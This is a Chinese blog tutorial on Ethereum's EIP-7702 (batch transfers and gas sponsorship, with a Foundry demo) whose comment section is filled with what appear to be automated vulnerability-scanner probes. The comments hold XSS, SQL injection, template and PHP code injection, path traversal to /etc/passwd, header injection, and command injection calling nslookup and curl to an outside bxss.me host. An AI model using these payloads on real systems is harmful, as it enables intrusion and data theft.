Pectra 升级的核心:EIP-7702的原理分析和实操

什么是 EIP-7702

EIP-7701 是以太坊 Pectra 升级的内容之一。是一种新的交易类型( 0x4 )。提高了以太坊的账号抽象的能力,支持直接使用 EOA 账号去执行临时智能合约。可以实现批量交易、gas 代付 等能力,这将会在钱包开发中起到很大作用。

EIP-7702 的能力

  • 批量交易:可以在一次 EOA 账号发起交易时,发送多次交易。(非 EIP-7702 类型的 EOA 账号一次只能发送一笔交易)

  • gas 代付:允许第三方(例如接收方或代理机构)为你支付本次交易的 gas 费用。(原始 EOA 交易没有 gas 代付能力)

  • 安全访问:授予临时的对合约的访问,用完后 EOA 账号恢复成为普通账号。调用时无须暴露私钥。

  • 合约共享:逻辑合约可以共享,只需部署一次,便可提供给多个 EOA 账号使用。逻辑合约可永久存在链上(临时合约用完即毁)。

EIP-7702 在钱包场景下的作用

可以用在交易所钱包的 归集 操作上。传统的以太坊 EOA 账号进行归集操作,从用户地址发送到归集地址,只能一笔一笔进行归集,并且需要交易所下发一笔小额资金作为归集 gas 费用。效率十分低下且存在粉尘资金增多、额外消耗 gas 的问题。而采用 EIP-7702 的新交易类型,可以在共用 EOA 账号的同时,平滑升级到支持批量归集gas 代付的能力。

EIP-7702 实现的核心原理

  • 签名授权 EOA 账号在签名时候,签订一个授权信息,内容包括 链 IDnonce委托地址EIP-712 的签名。这个授权信息供验证者节点打包交易时,从委托地址中查出运行代码,然后附加到 EOA 账号中。

    image.png - 临时代码注入 节点收到 EOA 账号发送的交易后,验证 EOA 账号的签名,从链上读取委托合约的 bytecode 然后临时注入到 EOA 账号的地址上。

  • 自动代码卸载 在交易执行完后,该地址又会变回普通 EOA 地址,EXTCODEHASH(address) == 0x0。代码区会变回 0。且状态不会存储到链上,确保不存在污染。

EIP-7702 实操及流程解析

git clone https://github.com/quiknode-labs/qn-guide-examples.git
cd qn-guide-examples/ethereum/eip-7702
  1. 安装依赖 安装 forge 库和 OZ 代码库
forge install foundry-rs/forge-std
forge install OpenZeppelin/openzeppelin-contracts
  1. 启动 anvil 注意,在未完全升级之前,必须携带--hardfork prague 参数,否则无法执行。
anvil --hardfork prague
  1. 使用 script 部署合约
❯ forge script script/BatchCallAndSponsor.s.sol \
  --rpc-url http://127.0.0.1:8545 \
  --broadcast \
  --tc BatchCallAndSponsorScript -vvvv

观察到以下结果,代码部署成功。 image.png 6. 观察日志 - performDirectExecution() 批量转账日志观察

image.png - performSponsoredExecution() gas 代付日志观察

image.png 6. 部署流程解析 - 原始 EOA 转账 首先来分析一下没有 EIP-7702 的原始转账情况,用户 A 通过离线签名,将交易发送到以太坊 RPC 节点,在通过对用户 A 的签名认证之后,可以将交易广播到以太坊网络。此时,交易只能一笔一笔的发送,且无 gas 代付能力。

image.png

  • performDirectExecution() 批量转账 而在使用了 EIP-7702 后,交易流程发生了变化。首先,我们来看一个总的执行图。后面再回去根据代码分析。

image.png 1. 在这个执行图中(A 代指 AliceB 代指 Bob),EOA 账户 Alice 离线发起委托签名,签名时,将委托的逻辑合约包含在其中,发送给以太坊 RPC 节点。

![image.png](https://img.learnblockchain.cn/attachments/2025/04/Nk5ilkKQ68047cd0a9dee.png)
  1. 然后,RPC 节点经过验证签名有效后,读取这个逻辑合约的字节码,注入给 EOA 用户 Alice。此时,用户 Alice 从一个 EOA 账户升级成为一个临时合约账户(合约的地址和用户 Alice 的地址一致),可以执行合约的逻辑(批量转账等)

    image.png

  2. 在此处 Alice 的临时合约中,因为合约的调用者是 Alice,无须对 Alice 进行验签处理,使用 require(msg.sender == address(this)) 即可完成签名的验证。 image.png

  3. 此外,由于发送给 RPC 节点时 from 地址为 Aliceto 地址也为 Alice。在此过程中,Alice 为合约账户,属于合约内部交易,所以这条记录不会被记录在以太坊的交易记录中。

  4. 最后,这个账户就拥有了合约的调用能力,其中的交易给 Bob 的两笔交易(ETHERC20 代币)都通过 B.call()的方式进行发送到以太坊网络中。(from 地址为 Aliceto 地址为 Bobfrom 地址属于合约地址,to 地址属于 EOA 地址,属合约内部交易,故也不存在交易记录中)

image.png - performSponsoredExecution() gas 代付

![image.png](https://img.learnblockchain.cn/attachments/2025/04/jPWUZ6gc6804768f7da6c.png)
`gas` 代付的情况相对于普通批量转账的场景而言,稍微复杂与一点。可以分为以下几步:
1. **Alice 构造委托合约,并签名**:
![image.png](https://img.learnblockchain.cn/attachments/2025/04/O9z63gLv68047ea636c22.png)
2. **Bob 持有 Alice 的数据,并签名**:
![image.png](https://img.learnblockchain.cn/attachments/2025/04/MQ09Dfrq68047f02cc427.png)
3. **Bob 发送交易到 RPC 节点**:

![image.png](https://img.learnblockchain.cn/attachments/2025/04/bLiUK24Q68047f58ec0dd.png)

4. `RPC` 节点对 `Bob` 进行验签,通过后读取 `Alice` 委托的逻辑合约代码,注入到 `Alice` 的地址中。然后广播交易。此时,用户 `Alice` 从一个 `EOA` 账户升级成为一个临时合约账户(合约的地址和用户 `Alice` 的地址一致),可以执行合约的逻辑(批量转账等)

 5. 并且,由于在这种 `gas` 代付的方案中,交易的发起者是 `Bob`,所以 `RPC` 节点在进行验签的时候,只会验证 `Bob` 的签名,`Alice` 的签名并不会去处理。在合约中,没办法像上面批量交易那样使用 `require(msg.sender == address(this))` 故我们临时合约中还需要去验证 `Alice` 的签名,以防止伪造交易的情况出现。

![image.png](https://img.learnblockchain.cn/attachments/2025/04/zFru4hLj68047facb70cb.png)

6.  此外,由于发送给 `RPC` 节点时,发送者 `from` 为 `Bob`,接受者 `to` 地址为 `Alice`,`Bob` 是一个 `EOA` 账户,`Alice` 为一个合约账户,故这笔交易记录会被记录上。  
  ![image.png](https://img.learnblockchain.cn/attachments/2025/04/6Lio6sv068047942d73ca.png)
 7. 但是,由于在 `Alice` 合约内部,发生了从 `Alice` 转账给 `Tom`(也可以是 `Bob`) 的情况,`Alice` 属于合约地址,`Tom`(`Bob`) 属EOA 地址,属合约内部交易,故这笔记录也不会存在以太坊的交易记录中。

image.png

全部评论(192)
小问
### ~~1.
点赞
回复
小问
1
点赞
回复
小问
### ~~1.
点赞
回复
小问
1<aY0Qesj<
点赞
回复
小问
### ~~1.
点赞
回复
小问
1<img sRc='http://attacker-9358/log.php?
点赞
回复
小问
1<a5LaCK4 x=9544>
点赞
回复
小问
1<ifRAme sRc=9548.com></IfRamE>
点赞
回复
小问
### ~~1.
点赞
回复
小问
1<WUY8ZQ>GMYJG[!+!]</WUY8ZQ>
点赞
回复
小问
### ~~1.
点赞
回复
小问
### ~~1.
点赞
回复
小问
### ~~1.
点赞
回复
小问
### ~~1.
点赞
回复
小问
1wJ5cb <ScRiPt >I9Qz(9991)</ScRiPt>
点赞
回复
小问
### ~~1.
点赞
回复
小问
1}body{zzz:Expre/**/SSion(I9Qz(9539))}
点赞
回复
小问
<a HrEF=jaVaScRiPT:>
点赞
回复
小问
<a HrEF=http://xss.bxss.me></a>
点赞
回复
小问
### ~~1.
点赞
回复
小问
1<input autofocus onfocus=I9Qz(9174)>
点赞
回复
小问
�<img zzz onmouseover=I9Qz(97971) //�>
点赞
回复
小问
1&lt;ScRiPt&gt;I9Qz(9290)&lt;/sCripT&gt;
点赞
回复
小问
@@O4sac
点赞
回复
小问
1\u003CScRiPt\I9Qz(9207)\u003C/sCripT\u003E
点赞
回复
小问
%31%3C%53%63%52%69%50%74%20%3E%49%39%51%7A%289315%29%3C%2F%73%43%72%69%70%54%3E
点赞
回复
小问
1'"
点赞
回复
小问
### ~~1. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
点赞
回复
小问
1<img/src=">" onerror=alert(9808)>
点赞
回复
小问
1<img src=xyz OnErRor=I9Qz(9588)>
点赞
回复
小问
1<img src=//xss.bxss.me/t/dot.gif onload=I9Qz(9557)>
点赞
回复
小问
1<body onload=I9Qz(9367)>
点赞
回复
小问
rKLDq89J')) OR 742=(SELECT 742 FROM PG_SLEEP(15))--
点赞
回复
小问
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9012'>
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
1<isindex type=image src=1 onerror=I9Qz(9215)>
点赞
回复
小问
555
点赞
回复
小问
GUZfBVQa') OR 842=(SELECT 842 FROM PG_SLEEP(15))--
点赞
回复
小问
1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9622></ScRiPt>
点赞
回复
小问
555
点赞
回复
小问
1<ScRiPt >I9Qz(9617)</ScRiPt>
点赞
回复
小问
agIbeVfn' OR 773=(SELECT 773 FROM PG_SLEEP(15))--
点赞
回复
小问
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%39%51%7A%28%39%36%30%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
点赞
回复
小问
555
点赞
回复
小问
1<script>I9Qz(9558)</script>
点赞
回复
小问
1<WWJFD5>IPXUF[!+!]</WWJFD5>
点赞
回复
小问
1<ScRiPt >I9Qz(9496)</ScRiPt>
点赞
回复
小问
xMxXJFti'; waitfor delay '0:0:15' --
点赞
回复
小问
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
点赞
回复
小问
555
点赞
回复
小问
dfb__${98991*97996}__::.x
点赞
回复
小问
dfb[[${98991*97996}]]xca
点赞
回复
小问
1 waitfor delay '0:0:15' --
点赞
回复
小问
dfb{{98991*97996}}xca
点赞
回复
小问
555
点赞
回复
小问
1
点赞
回复
小问
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
点赞
回复
小问
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
点赞
回复
小问
1
点赞
回复
小问
555
点赞
回复
小问
<th:t="${dfb}#foreach
点赞
回复
小问
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
点赞
回复
小问
555
点赞
回复
小问
1
点赞
回复
小问
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
点赞
回复
小问
555
点赞
回复
小问
<%={{={@{#{${dfb}}%>
点赞
回复
小问
if(now()=sysdate(),sleep(15),0)
点赞
回复
小问
555
点赞
回复
小问
bfgx4484%C0%BEz1%C0%BCz2a%90bcxhjl4484
点赞
回复
小问
-1" OR 2+22-22-1=0+0+0+1 --
点赞
回复
小问
-1' OR 2+813-813-1=0+0+0+1 or 'v6w0gNON'='
点赞
回复
小问
555
点赞
回复
小问
-1' OR 2+916-916-1=0+0+0+1 --
点赞
回复
小问
-1 OR 2+629-629-1=0+0+0+1
点赞
回复
小问
-1 OR 2+933-933-1=0+0+0+1 --
点赞
回复
小问
### ~~1.
点赞
回复
小问
bfg2853%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2853
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
19237314
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
555
点赞
回复
小问
### ~~1.
点赞
回复
小问
'"()&%<zzz><ScRiPt >I9Qz(9339)</ScRiPt>
点赞
回复
小问
1'"()&%<zzz><ScRiPt >I9Qz(9678)</ScRiPt>
点赞
回复
小问
555
点赞
回复
小问
### ~~1.
点赞
回复
小问
'.print(md5(31337)).'
点赞
回复
小问
### ~~1.
点赞
回复
小问
${@print(md5(31337))}\
点赞
回复
小问
<!--
点赞
回复
小问
### ~~1.
点赞
回复
小问
${@print(md5(31337))}
点赞
回复
小问
'"
点赞
回复
小问
### ~~1.
点赞
回复
小问
";print(md5(31337));$a="
点赞
回复
小问
';print(md5(31337));$a='
点赞
回复
小问
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
点赞
回复
小问
xfs.bxss.me
点赞
回复
小问
@@3Jznu
点赞
回复
小问
### ~~1.
点赞
回复
小问
WEB-INF\web.xml
点赞
回复
小问
"||sleep(27*1000)*wbybvx||"
点赞
回复
小问
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
点赞
回复
小问
WEB-INF/web.xml
点赞
回复
小问
'||sleep(27*1000)*xykugc||'
点赞
回复
小问
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
点赞
回复
小问
"&&sleep(27*1000)*rvrwtb&&"
点赞
回复
小问
1'"
点赞
回复
小问
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
点赞
回复
小问
'&&sleep(27*1000)*vaddyd&&'
点赞
回复
小问
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
点赞
回复
小问
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
点赞
回复
小问
'"()
点赞
回复
小问
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
点赞
回复
小问
'+'A'.concat(70-3).concat(22*4).concat(103).concat(67).concat(105).concat(73)+(require'socket' Socket.gethostbyname('hitfj'+'qrhpisrb59ae6.bxss.me.')[3].to_s)+'
点赞
回复
小问
### ~~1.
点赞
回复
小问
bxss.me/t/xss.html?%00
点赞
回复
小问
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
点赞
回复
小问
"+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(112).concat(76)+(require"socket" Socket.gethostbyname("hitsj"+"fkmhmttb8ec93.bxss.me.")[3].to_s)+"
点赞
回复
小问
HttP://bxss.me/t/xss.html?%00
点赞
回复
小问
..\..\..\..\..\..\..\..\windows\win.ini
点赞
回复
小问
;(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)|(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)&(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)
点赞
回复
小问
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
点赞
回复
小问
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
点赞
回复
小问
`(nslookup -q=cname hitlohaiaaeot756de.bxss.me||curl hitlohaiaaeot756de.bxss.me)`
点赞
回复
小问
/../../../../../../../../../../boot.ini
点赞
回复
小问
^(#$!@#$)(()))******
点赞
回复
小问
|(nslookup -q=cname hitrgwombyagve4762.bxss.me||curl hitrgwombyagve4762.bxss.me)
点赞
回复
小问
../../../../../../../../../../windows/win.ini%00.jpg
点赞
回复
小问
!(()&&!|*|*|
点赞
回复
小问
### ~~1.
点赞
回复
小问
C:\WINDOWS\system32\drivers\etc\hosts
点赞
回复
小问
&(nslookup -q=cname hitzujsgofnudf62f8.bxss.me||curl hitzujsgofnudf62f8.bxss.me)&'\"`0&(nslookup -q=cname hitzujsgofnudf62f8.bxss.me||curl hitzujsgofnudf62f8.bxss.me)&`'
点赞
回复
小问
)
点赞
回复
小问
/WEB-INF/web.xml
点赞
回复
小问
&nslookup -q=cname hitcgenjlqirh8f1c1.bxss.me&'\"`0&nslookup -q=cname hitcgenjlqirh8f1c1.bxss.me&`'
点赞
回复
小问
".gethostbyname(lc("hitcu"."wpmwieaze428c.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(89).chr(111).chr(85)."
点赞
回复
小问
bxss.me
点赞
回复
小问
/\../\../\../\../\../\../\../etc/passwd
点赞
回复
小问
$(nslookup -q=cname hitzvncbblyer95f72.bxss.me||curl hitzvncbblyer95f72.bxss.me)
点赞
回复
小问
'.gethostbyname(lc('hitzj'.'cylusuuu32ce5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(68).chr(111).chr(86).'
点赞
回复
小问
ShLZxehq')) OR 200=(SELECT 200 FROM PG_SLEEP(15))--
点赞
回复
小问
c:/windows/win.ini
点赞
回复
小问
file:///etc/passwd
点赞
回复
小问
(nslookup -q=cname hitspzdddnmem76446.bxss.me||curl hitspzdddnmem76446.bxss.me))
点赞
回复
小问
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
点赞
回复
小问
/etc/shells
点赞
回复
小问
|echo ocmdoe$()\ xcpcdn\nz^xyu||a #' |echo ocmdoe$()\ xcpcdn\nz^xyu||a #|" |echo ocmdoe$()\ xcpcdn\nz^xyu||a #
点赞
回复
小问
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
点赞
回复
小问
http://bxss.me/t/fit.txt%3F.jpg
点赞
回复
小问
&echo ooxbkv$()\ oksfgy\nz^xyu||a #' &echo ooxbkv$()\ oksfgy\nz^xyu||a #|" &echo ooxbkv$()\ oksfgy\nz^xyu||a #
点赞
回复
小问
../././../././../././../././../././../././../././../././../././../././etc/passwd
点赞
回复
小问
Http://bxss.me/t/fit.txt
点赞
回复
小问
echo kdahtv$()\ aziluh\nz^xyu||a #' &echo kdahtv$()\ aziluh\nz^xyu||a #|" &echo kdahtv$()\ aziluh\nz^xyu||a #
点赞
回复
小问
### ~~1.
点赞
回复
小问
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
点赞
回复
小问
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
点赞
回复
小问
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
点赞
回复
小问
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
点赞
回复
小问
&n967321=v993152
点赞
回复
小问
/.././.././.././.././.././.././.././../etc/./passwd%00
点赞
回复
小问
fS7kLG97') OR 724=(SELECT 724 FROM PG_SLEEP(15))--
点赞
回复
小问
%2fetc%2fpasswd
点赞
回复
小问
/etc/passwd
点赞
回复
小问
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
点赞
回复
小问
### ~~1.
点赞
回复
小问
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
点赞
回复
小问
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
点赞
回复
小问
../../../../../../../../../../etc/passwd%00.jpg
点赞
回复
小问
tJy09kVP' OR 743=(SELECT 743 FROM PG_SLEEP(15))--
点赞
回复
小问
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
点赞
回复
小问
../../../../../../../../../../../../../../../proc/version
点赞
回复
小问
file:///etc/passwd
点赞
回复
小问
../../../../../../../../../../../../../../windows/win.ini
点赞
回复
小问
### ~~1.
点赞
回复
小问
../../../../../../../../../../../../../../etc/passwd
点赞
回复
小问
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
点赞
回复
小问
-1)) OR 427=(SELECT 427 FROM PG_SLEEP(15))--
点赞
回复
小问
"+response.write(9423510*9379819)+"
点赞
回复
小问
to@example.com>%0d%0abcc:009247.15-5503.15.9c362.20245.2@bxss.me
点赞
回复
小问
### ~~1.
点赞
回复
小问
${9999063+10000484}
点赞
回复
小问
'+response.write(9423510*9379819)+'
点赞
回复
小问
%0abcc:009247.15-5499.15.9c362.20245.2@bxss.me
点赞
回复
小问
<esi:include src="http://bxss.me/rpb.png"/>
点赞
回复
小问
response.write(9423510*9379819)
点赞
回复